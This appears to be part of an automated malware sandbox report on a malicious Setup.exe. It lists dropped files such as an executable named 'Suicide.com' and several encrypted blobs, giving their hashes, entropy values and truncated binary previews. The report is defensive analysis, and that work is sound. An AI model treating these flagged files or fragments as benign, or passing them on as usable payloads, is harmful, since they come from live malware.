Preview:	..u.VMfM....f'4....DSb..>/~.....-S..A.?.H%..w..J..dEv.o.......e.o.v_^p.K......g3..<L:\....!.P.{.-..0..g+.A89.v..........r.p.qS.1.s.`.6G........j%$c.c...S......c..$..S...3.....$.QK/y...X./>.9U.?4.o.e..n0o.....YmR..97..Ggw..:.L...a.z..D.}..z0k&..U^s7..&6.74.....:m.......6...R....}.a.z..fI..tCM.s..7..~......0..N....5..5p.,X..^.a....1.k.Gg....7g.....e.kHy.^.v..)...P...e....=m...%....X..7.&n...."...._N..\.;.X..a....... $L....s`O.~.q.H.".......5.a. ..u......mZT..ui...:<.yh.Wm._...?8..h..5..$H;..i\|@..P.3~.......l...a....s.d0,.P.2.g..[.\.=...[:...x.....Lq^....8.....?.=UO<.t.z.]..3.k^.K.B?@.K........d.....tam.)$..U.......s.b..Q..Rs,.S..3.-..)r....U8.S.0{[>.x.l!.W.)!..o_......V....Yu 7..a.r..{..]].....OY...N@...o8....I..M...........w<..[......hk[#c.._.~~..G....Q$...G.g.\.......k1._...V.C#i..CWB............A.M V....S...&.C.6Sav...).....[....~.#..4Z(.......X...,..3...q..iE...0..cY..@B]..R/.-3....K.Tb..._U...vE.+D..... .`.<..8.#......

C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: xoJxSAotVM.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse Filename: Full_Setup_v24.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 'Setup.exe, Detection: malicious, Browse Filename: !SET__UP.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Argue

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	53056
Entropy (8bit):	7.996381450136675
Encrypted:	true
SSDEEP:	1536:fMRzElw0bdj8XI6bzj5juitd8Mh/kENmQeHY4:Gglwidkbbzj5LXh/U24
MD5:	A98C50301213020F0A10E841A3652FF5
SHA1:	2C0FC3D0C082583BD15E1E6388DF2869FDECC234
SHA-256:	C6259EA037D04A86146D111611B1EF563296BCE401F687794D2A96F018575106
SHA-512:	91A100725F9A4BBA585889A3F3E88D898610C34225DF138C7A76324F1B1D97595F41FD85541AD0A20D5553C8602FAA84BFC3D16DBE65F19C1FAD3B8699E42256
Malicious:	false
Preview:	........x..w.x...hm79B.(J...Y=.....2'....q.].z.........gp....x..T....<.....~j.~:..."..L.n.t.....\.....}Z.....7..G..3.O%..@l.A.............).4..4'.=mm...s..m.X<<.d.wXKC.....?...>....uc..j.`.2:...7...^..d..Y....GIyt1....Qw..,..O...#m...}....$......p.<0..f.].../..k..:..B..LR......7.n/Q@..bd..T.m.........ov;...3.].?3..Iz..7..xE.d.I".~.+.!....../9s..Q....#5U..S{...T.X.q.8..g.......V.].....w.>EkC p....~..l1..q..v.....4..v..R&.X....,f..{/.6....v..)=.C.s$.I(.PH.U..$...-..=v./...\fO!.s.V...Q{T...X.X.<D...Z+?.x.8{.......t..zzf..a}.$...D*......C.^..qn..%....&...z........n....w.KG2....Hh2.K<..[....:%?.........O:..s..)._o......VV..!\....S..]rW.\..E(.I...[.T.$vh.\|.f..8T.Le.H.9.[.T..+...........z....\|...h.\|..\|...+....B..9...2........1.B.\|ZL.._9.{..gY,..\.f..f.j.d.T.F....u..Z;..Z.V7u.+...[....s..DD...^L....{!.......=....).o..K..u...=..+~k!.Lq....:?...Qq...5P.<....I#$S#.f3...}]....<.O.+W ......xo..(..#Dp.7.....Uo<.MsP...`-.7......-v..A...G.].[.T.P...d..B..,

C:\Users\user\AppData\Local\Temp\Brazilian

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	5.509135628255196
Encrypted:	false
SSDEEP:	768:HUGM4INduPbOU+aI4kSmEusWjcd+DvFQC7VkrHpIu9xhSaAwuNbCc/mex/SSi:ZMBNB+usWjcdGQuklIusaAwu9hPxi
MD5:	9C68F92129BAE60CB72E678A694EE44A
SHA1:	58CF0171E00341E460FEE379E11C0F6B7C8B8A2F
SHA-256:	25996AC1B1BB15F1171EBD90EE317ACE372E97D6AF73889A7FC1DD398C11A245
SHA-512:	8DFEAE08963DB62D95B49EF361635572A880D11B79A369528686ED6B7528F5B65C94EFA9AF78076F56EE4037E4EE2934D9D39B2E8803B1C48A1550DA6C77E2E7
Malicious:	false
Preview:	L.c.U.?.Jup.J.?CY...?.?..X7.4.?..T..).?KB..0..?&D...?lU.....?.E0d...?KYC....?.:.....?@.....?..L....?#.e.m..?.-F...?.DT....?.W...?..MU..?.z...{.?..l.Un.?.Q-..`.?>...R.?V.D..D.?oW.sg6.?U..J.(.?.>..t..?2....?.1_....?$2....?[.....?N...)..?...V...?l$G~..?..+6..?.tF4..?...,.~.?...."n.?.<..].?\|..L.?l6...;.?6...?.\|.59..?...:...?H.K....?s7.....?..I-...?.$z....?.9\...?..>\|.~.?..-..W.?.^\sY0.?:Rp.7..?m.bzA..?G.4's..?I.y...?%...=_.?..C\.2.?.O..u..?.m.....?..M....?...n.w.?KK.'.F.?..l.^..?:.." ..?....?..}6lw.?...:.@.?.7Z8>..?$.. f..?e')lW..?zD@..[.?...jq..?.P.J...?F...<..?.Q'J.`.?x..e_..?* A...?.".Sr..?xw...N.?k..$...?..S/...?..yx\|o.?P.6 d!.?.ZyrI..?.......?....*.?.T.....?...!.z.?...{...?..0.V..?.8.I.^.?..A;..?...wC..?.JG7.&.?.'..un.?...)...?m...y..?.......?..\|...?,"..Q..?./...b.?PV3. 2.?..S....?.p....?V.a..".?..Tl...?Pq.j...?....Y..?.p..,.?..l"..?cY.....?.\.3&..<.-DT.!.?.\.3&....-DT.!...\.3&..<.-DT.!.@........................................................UUUUUU.3

C:\Users\user\AppData\Local\Temp\Coaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.99809174520548
Encrypted:	true
SSDEEP:	1536:kreVPgs+3hflsMygt7QpfHGVxX/WFzubJCwXTVMRPnqPdRRvFUjbH//pXsjXtHN8:krcPKhflbTSiX+ZukKTqRW5FUPH/hXKE
MD5:	A9DEC1B7DFF28F70B61A919EE38E96EC
SHA1:	A33381BE7BB5E9190737488FDFFE4DA02EDB7B81
SHA-256:	6D6E2D366928B3F11932EFE280FE7B56C5B524D212017ADB01B652B19805A0B5
SHA-512:	A6FAB672250CD8FDE947644466C79798B1C5F22AE52ECD8A8513ED87910F638C4D31CDEFFCFB5BBBF8F15E19618457EBF77E9A330FDA0CD16699CF88AADA91E5
Malicious:	false
Preview:	..u.VMfM....f'4....DSb..>/~.....-S..A.?.H%..w..J..dEv.o.......e.o.v_^p.K......g3..<L:\....!.P.{.-..0..g+.A89.v..........r.p.qS.1.s.`.6G........j%$c.c...S......c..$..S...3.....$.QK/y...X./>.9U.?4.o.e..n0o.....YmR..97..Ggw..:.L...a.z..D.}..z0k&..U^s7..&6.74.....:m.......6...R....}.a.z..fI..tCM.s..7..~......0..N....5..5p.,X..^.a....1.k.Gg....7g.....e.kHy.^.v..)...P...e....=m...%....X..7.&n...."...._N..\.;.X..a....... $L....s`O.~.q.H.".......5.a. ..u......mZT..ui...:<.yh.Wm._...?8..h..5..$H;..i\|@..P.3~.......l...a....s.d0,.P.2.g..[.\.=...[:...x.....Lq^....8.....?.=UO<.t.z.]..3.k^.K.B?@.K........d.....tam.)$..U.......s.b..Q..Rs,.S..3.-..)r....U8.S.0{[>.x.l!.W.)!..o_......V....Yu 7..a.r..{..]].....OY...N@...o8....I..M...........w<..[......hk[#c.._.~~..G....Q$...G.g.\.......k1._...V.C#i..CWB............A.M V....S...&.C.6Sav...).....[....~.#..4Z(.......X...,..3...q..iE...0..cY..@B]..R/.-3....K.Tb..._U...vE.+D..... .`.<..8.#......

C:\Users\user\AppData\Local\Temp\Cruise

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.5922681959651355
Encrypted:	false
SSDEEP:	3072:no2IkVvh8p65Nu+dVtqi/x4Rqf21Rgat0g/bZaUAg0FuPOKBNJ:c8JTDD/xcq21R1p/rAOPOe3
MD5:	7DA0B8681866A428E968BCD6E6F27E9C
SHA1:	B034C2DC64A7A65894A6B21D244E396EC5EE068D
SHA-256:	4A716734B55B01E3D73FCC5B19E073E4D20011CD805FE6005B8C4B142151BA1E
SHA-512:	896A27EFA8D0C5084AB96E8D209064F34D183B471466951CE82226E5B5A1C1BB6C7782B13CAC6B8C9C530A4B8F365CC85A1629EB36555D7234D364A9DE082CDC
Malicious:	false
Preview:	..PW.4.....~.j.j.W....I..u...........>...u..........._.F.....3.^..]...U..E.V..@........P....I...t.j.....I.P...H.........E.....E...u..M.....3.^]...U..E........@.SV..0..W.x......v.......PV.E...P.......u..u...............j.j.j.....I......u.j.....I.P...H....b.....e....l.....5..I.t..E..E.....Ph~f..W..j..E.PW.. .I...t4....I.=3'..u.j...l...........PW.........W....I..Y....e...E.Ph~f..W..u....f....>_.F.....3.^[..]...U....SV.u...W.E......~..v..F..H......E..V..2..z......v....{...PV.E..P......ttj.j.j.....I......u.j.....I.P...H....L....Jj..E.PW....I....t..u.W....I...u..u........>.)j.....I.P...H........W....I..u.........._.F.....3.^[..]...U...$VW...M..g....E..@..0........E.P.v......u.....I...u#P....I.P...H........M.h..I.......B.@.j..0.E.P.......u.....I.P.M..=....E.P.M......M.P.Q....M......M...._3.^..]...U...0...SV.u.W...F.........V...]..J.......M...h..I..Y...j....u...S.H...............l...........PS.............F.P.h...YP.M......].j.VS.u.....I..............tm.E..x..r..

C:\Users\user\AppData\Local\Temp\Curtis

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	4.504308471119967
Encrypted:	false
SSDEEP:	768:JAGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07LULTN3Efr8qcDP8WBoe:Jl6JPTcUNx6/xhgariwYLTN3EfrDWye
MD5:	B4B82AFFD1CC08FC2C74C9D515E4DC88
SHA1:	F44F64F4F9E8128E25A2686CC6764112B8AFDAC8
SHA-256:	6A249FBC4013C6CF1B12C137C4915CFB12F521E46EFA134946BA049F5C7F448A
SHA-512:	492AFC9A94857C34325123BFFCD4BCB35203767028B13C305994AD01F10DAA902414C3CF7FF27EB2CB18AF8863BFA8FFFCD5A312186263521C353C2059FDC89C
Malicious:	false
Preview:	.......Wow64DisableWow64FsRedirection..Wow64RevertWow64FsRedirection....{E..zE..\|E.c.C.c.C...C.c.C.c.C..{E.c.C..{E.N{E.[.C.[.C...C..C.?.C...C.c.C......[J..[J..[J...........\,I..........0.w,a..Q....m...jp5.c.d.2......y.......+L...\|.~.-.....d.... .jHq...A..}......mQ.....V.l...kdz.b...e.O\...l.cc=....... n;^.iL.A`.rqg....<G..K....k......5l..B...@....l.2u\.E....Y=..0.&:..Q.Q...a....!#.V...........(..._....$....\|o/.LhX..a.=-f..A.v.q... .*....q......3....x4............j.-=m..ld..\c..Qkkbal..0e.N.b...l{.......W.....eP....\|......bI-...\|.eL..Xa.M.Q.:t....0..A..J..=m......j.iC..n4F.g..`.s-.D...3_L...\|..<q.P.A.'..... ..%.hW..o ..f...a....^...)".......=.Y....;\...l.. ..........t9G..w..&.....s..c.;d.>jm..Zjz.......'......}D......h......i]Wb..ge.q6l...knv....+.Zz...J.go....C.....`...~.....8R..O.g..gW.....?K6.H.+..L....J.6`z.A..`.U.g..n1y.iF..a...f...o%6.hR.w...G....."/&.U.;..(....Z.+.j.\....1.....,...[..d.&.c.ju..m.....?6..g.r.W...J...z..+.{8....

C:\Users\user\AppData\Local\Temp\Disclose

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	7.997641015903991
Encrypted:	true
SSDEEP:	1536:5NMuU3Zj5uV3ZKj6VIUjDjz8UF2jW0q0+cKsOJ2PioVM9iOy7VyLJcK76FYikG:5NMuUpj5g3ZKpU3dFoOBcKsOJERRO2V1
MD5:	5AB96551C48FC54CBE6A97301C0D221A
SHA1:	D29E46DD2D8C241A6F63996A98BF40116673E99F
SHA-256:	2A9C1BEE4286BDE13FC014D7845E7556A4B9A591B4C41A2E66E851A921371B6A
SHA-512:	D97EEE02CBF5FD2E83875DC91EC843A6E4A3868CD40BDB63F340621C136897B0AE71DC58A229104CB3111D1D004ECE7C555F96BDD5B44B3F6C11C73DB68BF8B2
Malicious:	false
Preview:	F.>O..>cp...&...<'R..%.Q)NJT.Q....N...b......5......f.....5~Os..<g.;WW.g.:..n.}.$....c.C..L...?..OR..>.L>.@.W.W...Q....`o.9....$.".Cbfl.^....9.\.p.mB..."YNR....8.../;y...MP5....C,<.O.!<.}..A..$......t.=.T.!D+i..X~.....uH..$.....!..A9b...e.&4.Gb..o.....l..9.B.j.^......i...`.9.&.XA....;.o7..2&.D...:......M.HE'.2.aN...Y.3.`.i......:x4.A...NBw.b ^.......d..n)`X.s...f.8Y..-.t.".o.*O6..N............$.}@...g4f....TqV#...@.U1.C..^K\J..y.......#O0.D.........:.H(.f......u.u.)-...OD\.F.vz.....a.!..k..q....S..>..>HX!......2K..r...=..1.f...b?..jWH..P......C.2.'..by.:.is..K.ER.".+fE...G^.>...vU.G)..x..q>........sFM.NTL.Hm......T,.........F{.Y..].e^/{bhG1.w..R.9...!..S....s......n.m..O..\.J...5....Y..Tm.).'.g..D..i...2(.r..O]./9..".<..&.?.u..n0Z....W.g.r...._;.\|7f.{Z....[..^....r.M.\|C.....r....u..,EZ.c._h..mw..T.W...1UK..9..]e.]..r..q..w.Z0.....-+.Y5...b...$....0. .b...w.......K...........-...D.&....,.{\..+...../1..e..A{&Gye.<V.2.k{......

C:\Users\user\AppData\Local\Temp\Distributors

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	140288
Entropy (8bit):	6.739985599391929
Encrypted:	false
SSDEEP:	3072:UDKJtIs8di/37EM/j2xQeixApVIa0/viK:ptINsegA/12v3
MD5:	C1DBC53904B26891C98270815CF7C191
SHA1:	F97F8408340A9909B8BAF3F9BD668B7B0866DC89
SHA-256:	53D6600F0357C8784F297D92CE9726DA41762DC8C7DC361770AF2493F289F9DD
SHA-512:	AD380F8E300ADDB95F66A8F0A3032F54BA9FD120BA84ECD42045FE83B2E7787B0DB04B7529DC0297B081363E1678EF048A9BCFC166C3BFB4FBF026BFCC674838
Malicious:	false
Preview:	........~...B.+.t.3.......M..............N...B.+.t.3........E......3........f.F.f;B........E....F.;B.........B...~.+.t.3.......M........`.....~...B.+.t.3.......M........>.....~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3...._....F.;B............B.+.t.3.......M........2.....~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M........y.....~...B.+.t.3.......M........W.....N...B.+.t.3........E......3....1....F.;B.........B...~.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M........l.....~...B.+.t.3.......M........J.....~...B.+.t.3.......M........(.....N...B.+.t.3........E......3...

C:\Users\user\AppData\Local\Temp\Expensive

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997873521157365
Encrypted:	true
SSDEEP:	1536:VKwjK9R/kCBilQDry+xT9RE7UoYEN/cTdKtRZ+fAEo6US5aGjN0mm2:VD8/bMQD+eT9CZtbtufAEoDGm2
MD5:	EBA28E23F6CBD669BF0E7D62D9B9C903
SHA1:	59950597B147AF6FCAC8D036899D091158E59600
SHA-256:	0D3788811DB485ECD0CC3F26B6E308A21446431F6E6D5920625430AAF7427AE3
SHA-512:	788B3CD12AB44B4BE4ED368486BC454F6DEA618BFCC4E0FF331796837A473448F1C0E5FCBC1CDF2F6795741AE2AC2BAC4FC9E6B124DB625151757609DD6A001B
Malicious:	false
Preview:	`..>{..G..(4%.T.N.p.N.KD..mYm...B...n@...=.M~;.3........f<n...T....}LYe+....($.;..B.k....;.v.DB...]....pN..HQx..._.....<...ru..N......xU.iC.P\b....3...@%9.....6.s..J...t.~2;#.BZ.lY..4..$_..c......N.hB......c.....-_..\|.N&.M.I_[4[...s....^...O......Pe...V......s<U..X=..L.k....."6.[w.D\|,.h....0G..n3s.1.......J.=.d=d.....d.V..iB.........,.......O...q..bH.s.k.0..Q.hs.....P......@....H..o...@..M..MD}}.$\|6.:o...<.X...Uc5..Y....j......W.I. .....z.11....vSCb}u.U. .....5.o...m..&.MsWT.8w..?L...m.T...I..V}...5....V..B.........m.X0.8..79..E...Q\.......p.x...r.~Y.T(J..t..w?.;...0GQ...D.!...\|..,.s......_.....!+n.....9....K.b..<.....Hr....p...w.....OE.i.....~Y.0...@.._..Dx.5.U..],w........im.iP.v.%..K...#fT.....i..p....'3..4.H.....A(B......zs^..D.l...O.....X.8q.....tl9...3./..D\L3....'...$....g.sG..C.P. U...5..#..../.;..#....h..y...:..w..43..2.X...*0{...E..b..DEZ...].Z..M.Mr........-..80......M.J.F.2.........G[...:8h.d$...>T@.) 9.@...i.@U#l...M

C:\Users\user\AppData\Local\Temp\Fly

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997635178608515
Encrypted:	true
SSDEEP:	1536:vs6hjoFQjkV6buFbfL/HmLbEwMAHDsiAIJm/EETuTadlGcz0KvaAb:vs6BoFik8SHmMMZAIJm/7ld4KvaAb
MD5:	9CC714BA14F56E61A3ED55FAE950FACB
SHA1:	0991BA7ADA9E3216E802DA8F0A714EF31B88962B
SHA-256:	D9536B4F9AD456DDDFEE74C64F8D76E870ECEC113BD93442CA9B96F79D1E7C85
SHA-512:	41B8BB7D5A0217BA7D921C7A20FE8BAC719CD3EC327D776C4FDB699C11DAE7207F53E701E7A001A0E036F018776E84A59A66E63397C88A03D83C2A9365781549
Malicious:	false
Preview:	.6...a...B}.K.Z...C.).D;<.n..x.h.T.S..0...l.jI..J.${=6.t.>.j..q.....Q'..U..u.....sE...P....Ca.V.H=.....A...... 9.k...Du.M..NL..j.(R....a)...Y..,.iRZ.1AO..L.E.Pm1.l..Y....n...7.x~.dE.<C.9B.^e....\|O.....O....[..:.....M.r....x..:.)\|.O.Tb.~...vV!.........F.e.....Np...F.eWeU1v.[..=.......Q..:.y..[.....Pc_...Z.....`...o..[..4.D..4.._i..2.xr.].F....i..9a.O..bW.;.y......`........W....`[S[-u)....JR.,..E.4../..U..H..7#r._.....~..D6.......v...$./..H ..2.?HCO..!.4n.s...z..)9Nu..x....lJ..-."...j..%9?.o....1..\|.."X.g...o.iv.....bi....c..m.E)%...o......G..F.F.'..5`p<}.D.9.;..D.z=K.to.).........a.w...K.._...Q_/HI..-.8.7'..L.[.\|P.....v....\...........M.}...4.k.....h.(S`...;s3{.,k..Y.....1..2w.(#.t.W6...P.}e>...JsE..E.h.o.....cYc.Y..."K.bB.......<...{o...'..{..m......7./..a.1eC..m@.......)......E..$....c.N..r.Z'..#ze..40UE.#..'..j.y.:.4@%.{e..G..-.P%....Y...S[_'gb.T$.r.o...........,...B7,.P..r..2t%....A..$.&.W.....R...B_v j.<FU..c.B%\|...\|.>U..z...]1.1

C:\Users\user\AppData\Local\Temp\Hypothetical

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.998067564776392
Encrypted:	true
SSDEEP:	1536:xeseacdqcRGx6QwMr9IZG6WJfl6aVX6/FRlb9wIOz3MWzNZdfCZ7Z8MFwVf8yc4:phcRGdr9IZ7WVdX6DbQz3MWLQtBUi4
MD5:	428CEB3846FCFC54773992CA87BE9D58
SHA1:	5874EF76A8B4CABF84B0B92FAB6B3572161303B3
SHA-256:	263586AA621C153159638CC0ABDE16EA69B54177D49DCD2181CE801ABDA8F47F
SHA-512:	83E5D5BCB7BD5CCFE5E0DB83C2C582DE32D0584190C5BE2FC28B7CB3768203349197B6B725A6945EDCDB4C7098D105F24498083451C478B1124F3A626A96E96C
Malicious:	false
Preview:	r..4\|.\..?>.qx.}..G...'g.Vp..7..U...m......r~......r..2D..eL.3_P.[?.r0/.. 5.dC.....!'....l..M.Ph5..........?.+..!Bz......H\|fJtI7.L.I..}._.w.<B...7...Lg.J......_.?...T........eC!PRJ...7..>....]gR.~[9.f#........0Y...a...e./{-...)F* ..$...\h.(4:.D..1....Pw .O..Y.6.O......7..t..k.#.:p...Nl.@O.ja;.8....L..c....%.@}.M....0.M...`....S.y ./...tdC....5...7Wul.... ......U......L..dD.....:s.iqb4Y.r..ei{..xA".^.....`g.$.WC:..a.z..}.umJ6.W.I6........5...._.[G.gQ...2. .9.....]..."BMU.n...=FVQKn.n&...I.........K.<Em......Dy..L.....%>SCZ()...!-J..+.de...."....Z..e..PW...!.....5.!d..1.JL...L'.z;2tk.!..06...Z.[.fl.z.&.-J..*h...-L.4a&?m...z..Z.a..k..(...$p}"<7.a.s}..... ..c...4R&F..f"....g..3D]ay\|.....-...\7H...?hN6.<..dHu..4!...Jd...$6o?....."....}iR3$.~P]......e..7..Y{T.....R....uL.O.2....8..I.Z.......l......d.P$.v.`...s..[.{.o.[B."...}.......J..N.....O.{[...l.}.....G.(..;9=...?....Y.[:........j.NT.....\..J B\|.c....z~.?h..Xc...Dua=7.e.U...\|..v).Sq<..

C:\Users\user\AppData\Local\Temp\Led

Download File

Process:	C:\Users\user\AppData\Local\Temp\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.6226492244612505
Encrypted:	false
SSDEEP:	1536:Up5q/qw0j8sgyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljv5:UXqGjLPQ6ClAMfA4lelIJBSLL
MD5:	8F88D37B6B4AC31A10E4E94D47DCC3AD
SHA1:	289079EA4B7D0B21B10773F42362B184BB226A62
SHA-256:	391400F89794853BB56EA9CEAFA66E0A429C887200372E0B727693137DA2E00C
SHA-512:	5F4C0AF12A74F41A6A86D962DF45ADA9E8CBB1BD55774DDC43E4DBEF41E5CEEB126723A0DD559182E2F1701F845AAF4298DEECA3C41476813009629D41DB0565
Malicious:	false
Preview:	D..P.D$(......\|$ ........E.j).@..@...D$..W.....t..L$(.'......L$..(....L$..A...f...L$$f...>....D.D..D$$.0.`....\|$ ..."....E.j).@..@...D$........t..L$(......D$0...L$.......L$..A..0.L$(.........L$..D$.P.T$......D$.YH..D...HtoH../....M.............E.3.A.H..09L$ .......E.j).H..I..g.....t..L$(.7......t$....t$.V....HY...............I....M..5.xL......E.3.A.H..09L$ ..&....E.j).@..p................j).........t..L$(......L$....L$.3.f...xL......xL.......xL....xL....t.@...xL...xL....t.......xL...xL....t.......xL...xL................xL...xL..w...3...8..rL.....D$......D$.3.A...N.9L$ ..K....E.j).H..I..$.....t..L$(......D$....D$...xL...u...........j.........D.D.M..D$..0.P....E.3.A.H..09L$ .......E.j).H..I.......t..L$(.......D$..L$........m........rt...v..........D.D.M..D$..0......E..T$..L$..@......0.D$.P.f....D$..D$(Y.L$..T$.P.O....\|$$.Y..C....E.j).H..I........u*.L$.;L$.\|.;L$$...T$......L$(.............L$(......T$......D.D.M..D$..0.<....E..T$..L$..@......0.D$.P.....\|$$.Y.......E.

C:\Users\user\AppData\Local\Temp\MSI73BC.tmp

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI744A.tmp

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7489.tmp

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7580.tmp

Download File

